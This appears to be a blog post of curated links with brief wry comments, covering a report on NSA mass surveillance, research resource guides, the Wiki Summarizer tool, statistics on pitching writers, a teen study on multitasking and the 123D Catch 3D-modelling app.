No military, no economists, not even a politician – I think their perspective might be a bit skewed.
Electronic mass surveillance – including the mass trawling of both metadata and content by the US National Security Agency – fails drastically in striking the correct balance between security and privacy that American officials and other proponents of surveillance insist they are maintaining.
We arrived at this conclusion by subjecting a wide-range of surveillance technologies to three separate assessments by three parallel expert teams representing engineers, ethicists, and lawyers. Each team conducted assessments of surveillance technologies, looking at ethical issues they raise; the legal constraints on their use – or those that should exist – on the basis of privacy and other fundamental rights; and, finally, their technical usability and cost-efficiency.
“Comprehensive” is the word. Eventually, every “Thing” will bring its own resources – then we'll never find anything.
New on LLRX – Internet-of-Things (IOT) Resources
Via LLRX - Internet-of-Things (IOT) Resources – This is a comprehensive listing of Internet-of-Things (IOT) research resources and sites available on the Internet. Marcus P. Zillman developed this guide with the goal of highlighting the most current and actionable research resources available on this topic.
For all my students.
New on LLRX – Student Research Resources Library
Via LLRX.com – Student Research Resources Library – Marcus P. Zillman developed this Student Research Resources Library to provide researchers with a comprehensive listing of reliable topical resources and sites available on the Internet.
(Related) Here's how to get started.
Wiki Summarizer Can Help Students Start Their Research Projects
Wiki Summarizer is a site that allows you to search Wikipedia, have articles summarized by key points, and provides lists of articles that are related to your original search. Wiki Summarizer also offers expandable webs of related articles. For example, I searched for "Maine" and a web of related terms was created. Clicking on the "+" symbol next to each term opens a new element of the web. The final summary aspect of the Wiki Summarizer is the hyperlinked word clouds for every Wikipedia article. You can click on any word in the word clouds to jump to the corresponding Wikipedia article.
Wiki Summarizer could be a good tool for students who are just starting a research assignment and are not quite sure what terms to use or what topics to explore. By using the Wiki Summarizer web view or word cloud view students will be able to find some terms and topics that could help them alter and or direct their searches. In other words, Wiki Summarizer could help students who have a very broad research topic narrow down their searches.
Intended for Press Releases, but might apply to research, publications and resumes.
… So, how should you approach a major publisher? The first thing you need to understand is a writer’s capacity. On average, 45% of writers only publish one story per day. In fact, 60% of writers publish two or fewer stories per day, and 40% said they publish only one story per week. Meanwhile, 40% of these writers get pitched a minimum of 20 times per day, while 11% get 50 pitches per day and 8.4% get more than 100 pitches per day. That’s 100, 250, or 500 pitches a week for only five story spots. When you take into account that only 11% of these writers “often” write a story based on content that was sent through a pitch, 45% “sometimes” do, and 39% “rarely” do, you see the pile of email waste rising well above a person’s threshold to tolerate it.
Here’s the good news: our survey found that 70% of publishers are open to getting pitched a set of ideas that fit their beat, and they prefer collaboration over getting pitched a finished asset without prior contact.
What story angles are these writers interested in collaborating on? 39% of writers said the perfect piece of content possesses exclusive research, 27% said breaking news, and 15% said emotional stories. 19% filled in “other” and stated that content relevant to their audience was most important. Other popular terms included: interesting data, actionable advice, trending/timely angles, and high arousal emotions.
...and 100% believe they are the 15%.
Teen Researchers Defend Media Multitasking – WSJ
“Some teens doing homework while listening to music and juggling tweets and texts may actually work better that way, according to an intriguing new study performed by two high-school seniors. The Portland, Ore., students were invited to the annual conference of the American Academy of Pediatrics in San Diego this past weekend to present a summary of their research, which analyzed more than 400 adolescents. The findings: Though most teens perform better when focusing on a single task, those who are “high media multitaskers”—about 15% of the study participants—performed better when working with the distractions of email and music than when focusing on a single activity. The results are a surprise. Previous research generally has found that people who think they are competent multitaskers actually perform worse than others who try to focus on one thing at a time. But the latest study looked only at teens and is one of the few multitasking-research projects focused on this age group. The student researchers suggest this may explain the different outcomes.”
We have an underutilized 3D printer. Perhaps we could work something out?
123D Catch Turns Pictures Into 3D Models
123D Catch is a free iPad and Android app. The app makes it possible to turn your pictures into a 3D model that you can manipulate on your iPad or on your Android tablet.
To create a model with 123D Catch select a physical object that you can photograph with your tablet or phone. Then take a series of pictures of that object as you either walk around it or rotate it slowly as you take pictures of it. Then select the best images from those that you took (20+ images works best) to let Autodesk process and turn into a 3D model for you. Your completed 3D models can be shared to the Autodesk community where others can view and use them.
123D Catch could be a great app for creating virtual manipulatives to use in a math or science lesson. The app could also be used to create 3D models of interesting landmarks that you visit during a vacation, but that your students would otherwise only see in 2D pictures. Finally, all of the models that you create with 123D Catch can be edited in Meshmixer and printed with a 3D printer.